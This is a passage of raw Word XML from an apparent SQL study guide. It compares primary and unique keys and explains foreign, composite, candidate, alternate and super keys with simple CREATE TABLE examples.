          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1619210F"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D160846"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imary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31485EB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nique Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5960F896" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5744E52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niqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0916F51D"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Ensures all values in the column are </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50C61002"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lso ensures values are </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0148A90B" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782D86DA"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ll Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059B5CC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not be null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3442C9E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 contain one null value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4EFD365F" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B89C3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mber Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F263094"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Only </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> primary key per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07226EB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an have </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multiple</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> unique keys per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="46EB69A2" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="631BAB9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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3792618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ly identifies a row in a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B3345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events duplicate values in a column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="50B3B6C9" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="504054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ault Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE3704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utomatically creates a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>clustered index</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (in some DBs like SQL Server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0656F2F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reates a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>non-clustered index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="76E9883C" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19781AA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traint Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA461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imary Key Constraint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502A04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 Constraint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="781C641F" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00F452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59AF70">
          <v:rect id="_x0000_i3164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A030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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70940B6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TABLE Employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87184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 INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA76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ail VARCHAR(255) UNIQUE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69231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phone VARCHAR(20) UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75318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59F9FD0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_id → Primary Key (no duplicates, no nulls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666BFE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ail, phone → Unique Keys (no duplicates, but can be null once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD5D9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t me know if you want examples with insert queries too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487BA1C" w14:textId="203A52A7" w:rsidR="0025066D"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3165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD69628" w14:textId="518E41AF" w:rsidR="00DC5E8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC5E8B" w:rsidP="00DC5E8B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="_Toc197867961"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different Keys in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="747"/>
    </w:p>
    <w:p w14:paraId="6E7CB97A" w14:textId="25369B8F" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18"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is a detailed explanation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all types of keys in SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with purpose, characteristics, and examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E470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3166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3866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imary Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937922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73EFBF4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primary key uniquely identifies each record in a table. It must contain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cannot be NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F892AE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C40D24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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD034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consist of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single or multiple columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (composite key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C46D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reates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86638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DA5C99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6C33E7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1E3E0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100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE487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EFF26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3167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32163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oreign Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BA89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7D00DC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foreign key enforces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relationship</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between two tables. It referenc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 xml:space="preserve"> of another table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACC86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90299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sures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>referential integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397BB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unless specified otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF95D1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to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-one or one-to-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74958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1698CD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Department (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05457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 PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845DC1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pt_name VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B182DB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FF3B7" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74E18" w:rsidP="00E74E18">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3855B3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4AC413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5F2485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name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1714F46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0AE9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IGN KEY (dept_id) REFERENCES Department(dept_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167BAC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74C31A"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3168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D84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nique Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C3F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68D956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forces the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the values in one or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9326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00B7F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only one NULL in most databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F8C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able can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple unique keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D077D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necessarily a primary identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391DAC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D81F6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User (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE13F8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_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E574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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39785FE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049BA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3169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3407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omposite Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DBC7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1354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mbination of two or more columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to uniquely identify a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A652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02B0B2B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columns together form the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5B0C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no single column is unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CDF3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4AC7F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Orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F4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der_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22929EE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t_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6ABB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antity INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556038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MARY KEY (order_id, product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2956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B998A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3170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="172341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andidate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FC48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C7297C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any record in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334898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18BCAC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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple candidate keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF98A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m becom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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0F0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8E68F7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Student table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B390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_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6879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ail Both can be candidate keys if they are unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E90B1"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3171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1BE8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Alternate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24870DE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C2DD82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didate keys </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not chosen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9F33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1F851EF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as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5100A4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ill uniquely identifies records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE996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lastRenderedPageBreak/>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65406D9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Student (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9443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_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C118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  -- Alternate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B976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147137"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3172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447FBE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Super Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897E49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628A77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each row. It may include </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
